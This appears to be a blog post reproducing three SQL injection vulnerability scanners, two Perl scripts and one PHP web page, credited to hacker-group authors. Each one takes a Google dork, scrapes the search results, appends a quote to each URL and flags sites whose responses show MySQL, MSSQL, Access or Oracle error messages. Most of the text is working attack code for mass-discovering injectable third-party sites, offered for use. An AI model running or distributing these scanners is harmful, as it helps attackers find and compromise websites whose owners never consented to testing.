#!/usr/bin/perl
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
# .:. Script : SQLi Vulnerable Scanner .:.
# .:. Version : 3.0 fixed (06/10/2012) .:.
# .:. Author : Metropolis .:.
# .:. Home : https://www1.r00tw0rm.com/ .:.
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
# .:. MySQL Injection .:.
# .:. MSAccess Injection .:.
# .:. MSSQL Injection .:.
# .:. Oracle Injection .:.
# .:. Blind Injection .:.
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
# Useless version :
# http://pastebin.com/kKxCCJuU 1.0
# http://pastebin.com/FyPcTLRw 2.0
use LWP::UserAgent;
use Getopt::Std;
getopt('kpo', \%opts);
if($opts{'k'} eq '')
{
print "[Help] SQLi.pl -k shopping.php?id= -p 500\n"; # Max: 50,100,500,700,etc...
}
if($opts{'p'} eq '')
{
$opts{'p'} = 1;
}
print <<"Metropolis_intro";
___________
|.---------.|
|| ||
|| scanner ||
|| ||
|'---------'|
`)__ ____('
[=== -- o ]--.
__'---------'__ \
[::::::::::: :::] )
`""'"""""'""""`/T\\
\\_/
Metropolis_intro
system('COLOR A');
print "\n\n[Script] SQLi Vulnerable Scanner (MySQL,MSAccess,MSSQL,Oracle,Blind)\n";
print "[Author] Metropolis\n\n\n\n";
for($start = 0;$start != $opts{'p'}*10;$start += 10)
{
$t = "http://www.google.fr/search?hl=fr&q=".$opts{'k'}."&btnG=Search&start=".
$start;
$ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12)
Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E");
$response = $ua->get($t);
if ($response->is_success)
{
$c = $response->content;
@stuff = split(/<a href=/,$c);
foreach $line(@stuff)
{
if($line =~/(.*) class=l/ig)
{
$out = $1;
$out =~ s/"//g;
$out =~s/$/\'/;
$ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;
$response = $ua->get($out);
$error = $response->content();
if($error =~m/SQL syntax/)
{print "$out Vulnerable MySQL!\n";}
elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft
Access Driver/)
{print "$out Vulnerable MS Access!\n";}
elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error
=~m/Unclosed quotation mark/)
{print "$out Vulnerable MSSQL!\n";}
elsif($error =~m/mysql_fetch_array()/ || $error =~m/mysql_num_rows()/)
{print "$out Vulnerable Blind Possible!\n";}
elsif($error =~m/Microsoft OLE DB Provider for Oracle/)
{print "$out Vulnerable Oracle!\n";}
}
}
}
}
perl2
#!/usr/bin/perl use LWP::Simple; use LWP::UserAgent; use HTTP::Request; my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); } print "+++++++++++++++++++++++++++++++\n"; print "+ SQL - Google Search +\n"; print "+ CWH Underground +\n"; print "+++++++++++++++++++++++++++++++\n\n"; print "Insert Dork:"; chomp( my $dork = <STDIN> ); print "Total Query Pages (10 Links/Pages) :"; chomp( my $page = <STDIN> ); print "\n * Result:\n\n"; for($start = 0;$start != $page*10;$start += 10) { $t = "http://www.google.com/search?hl=en&q=".$dork."&btnG=Search&start=".$start; $ua = LWP::UserAgent->new(agent => 'Mozilla 5.2'); $ua->timeout(10); $ua->env_proxy; $response = $ua->get($t); if ($response->is_success) { $c = $response->content; @stuff = split(/<a href=/,$c); foreach $line(@stuff) { if($line =~/(.*) class=l/ig) { $out = $1; $out =~ s/\"//g; $out =~s/$/\'/; $ua = LWP::UserAgent->new(agent => 'Mozilla 5.2'); $ua->timeout(10); $ua->env_proxy; $response = $ua->get($out); $error = $response->content(); if($error =~m/mysql_/ || $error =~m/Division by zero in/ || $error =~m/Warning:/) {print "$out => Could be Vulnerable in MySQL Injection!!\n";} elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft Access Driver/) {print "$out => Could be Vulnerable in MS Access Injection!!\n";} elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error =~m/Unclosed quotation mark/) {print "$out => Could be Vulnerable in MSSQL Injection!!\n";} elsif($error =~m/Microsoft OLE DB Provider for Oracle/) {print "$out => Could be Vulnerable in Oracle Injection!!\n";} } } } }
php
- <php
- <html>
- <head>
- <title>m0bil3_xT's SQLi Scanner</title>
- <center><img src="http://i.imgur.com/lH3GO.png">
- </center>
- </head>
- <body bgcolor=#000000>
- <style>
- body{
- font: 10pt Verdana;
- }
- tr {
- BORDER-RIGHT: #3e3e3e 1px solid;
- BORDER-TOP: #3e3e3e 1px solid;
- BORDER-LEFT: #3e3e3e 1px solid;
- BORDER-BOTTOM: #3e3e3e 1px solid;
- color: #ff9900;
- }
- td {
- BORDER-RIGHT: #3e3e3e 1px solid;
- BORDER-TOP: #3e3e3e 1px solid;
- BORDER-LEFT: #3e3e3e 1px solid;
- BORDER-BOTTOM: #3e3e3e 1px solid;
- color: #2BA8EC;
- font: 10pt Verdana;
- }
- table {
- BORDER-RIGHT: #3e3e3e 1px solid;
- BORDER-TOP: #3e3e3e 1px solid;
- BORDER-LEFT: #3e3e3e 1px solid;
- BORDER-BOTTOM: #3e3e3e 1px solid;
- BACKGROUND-COLOR: #111;
- }
- input {
- BORDER-RIGHT: #3e3e3e 1px solid;
- BORDER-TOP: #3e3e3e 1px solid;
- BORDER-LEFT: #3e3e3e 1px solid;
- BORDER-BOTTOM: #3e3e3e 1px solid;
- BACKGROUND-COLOR: Black;
- font: 10pt Verdana;
- color: #ff9900;
- }
- input.submit {
- text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
- color: #FFFFFF;
- border-color: #009900;
- }
- code {
- border : dashed 0px #333;
- BACKGROUND-COLOR: Black;
- font: 10pt Verdana bold;
- color: while;
- }
- run {
- border : dashed 0px #333;
- font: 10pt Verdana bold;
- color: #FF00AA;
- }
- textarea {
- BORDER-RIGHT: #3e3e3e 1px solid;
- BORDER-TOP: #3e3e3e 1px solid;
- BORDER-LEFT: #3e3e3e 1px solid;
- BORDER-BOTTOM: #3e3e3e 1px solid;
- BACKGROUND-COLOR: #1b1b1b;
- font: Fixedsys bold;
- color: #aaa;
- }
- A:link {
- COLOR: #2BA8EC; TEXT-DECORATION: none
- }
- A:visited {
- COLOR: #2BA8EC; TEXT-DECORATION: none
- }
- A:hover {
- text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
- color: #ff9900; TEXT-DECORATION: none
- }
- A:active {
- color: Red; TEXT-DECORATION: none
- }
- .listdir tr:hover{
- background: #444;
- }
- .listdir tr:hover td{
- background: #444;
- text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
- color: #FFFFFF; TEXT-DECORATION: none;
- }
- .notline{
- background: #111;
- }
- .line{
- background: #222;
- }
- </style>
- <center>
- <br/>
- <?php
- echo "<font style='text-shadow: 0px 0px 6px rgb(255, 0, 0), 0px 0px 5px rgb(300, 0,
- 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff; font-weight:bold;' size='5'> </font><br><font style='text-shadow: 0px 0px 6px rgb(255, 0, 0), 0px 0px 5px
- rgb(300, 0, 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff; font-weight:bold;'
- size='5'></font></b><br><br><center><a href='
- target='_blank'></a><br><a</a></center><br></font><center><font style='text-shadow: 0px 0px 6px rgb(255, 0,
- 0), 0px 0px 5px rgb(300, 0, 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff;
- font-weight:bold;' size='2'></font><br><br></center>";
- $your_ip = $_SERVER['REMOTE_ADDR'];
- echo "<font style='text-shadow:0px 0px 10px #12E12E; font-weight:bold;' color=#FF0000
- size='2'>Your IP : </font><font style='text-shadow:0px 0px 10px #12E12E;
- font-weight:bold;' color=#FF0000 size='2'>$your_ip</font><br>";
- $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
- echo "<font style='text-shadow:0px 0px 10px #12E12E; font-weight:bold;' color=#FF0000
- size='2'>Server IP : </font><font style='text-shadow:0px 0px 10px #12E12E;
- font-weight:bold;' color=#FF0000 size='2'>$server_ip </font><br><br>";
- echo '<form method="post" action=""><font color="red">Dork :</font> <input type="text"
- value="" name="dork" size="20"/><input type="submit" name="scan"
- value="Scan"></form></center>';
- ob_start();
- set_time_limit(0);
- if (isset($_POST['scan'])) {
- $browser = $_SERVER['HTTP_USER_AGENT'];
- $first = "startgoogle.startpagina.nl/index.php?q=";
- $sec = "&start=";
- $reg = '/<p class="g"><a href="(.*)" target="_self" onclick="/';
- for($id=0 ; $id<=30; $id++){
- $page=$id*10;
- $dork=urlencode($_POST['dork']);
- $url = $first.$dork.$sec.$page;
- $curl = curl_init($url);
- curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
- $result = curl_exec($curl);
- curl_close($curl);
- preg_match_all($reg,$result,$matches);
- foreach($matches[1] as $site){
- $url = preg_replace("/=/", "='", $site);
- $curl=curl_init();
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_URL,$url);
- curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
- curl_setopt($curl,CURLOPT_TIMEOUT,'5');
- $GET=curl_exec($curl);
- if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute
- query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch​_row
- ()|SELECT *
- FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$GET)) {
- echo '<center><b><font color="#E10000">Found : </font><a href="'.$url.'"
- target="_blank">'.$url.'</a><font color=#FF0000> <-- SQLI Vuln
- Found..</font></b></center>';
- ob_flush();flush();
- }else{
- echo '<center><font color="#FFFFFF"><b>'.$url.'</b></font><font color="#0FFF16">
- <-- Not Vuln</font></center>';
- ob_flush();flush();
- }
- ob_flush();flush();
- }
- ob_flush();flush();
- }
- ob_flush();flush();
- }
- ?>
- </body>
- </html>
Không có nhận xét nào:
Đăng nhận xét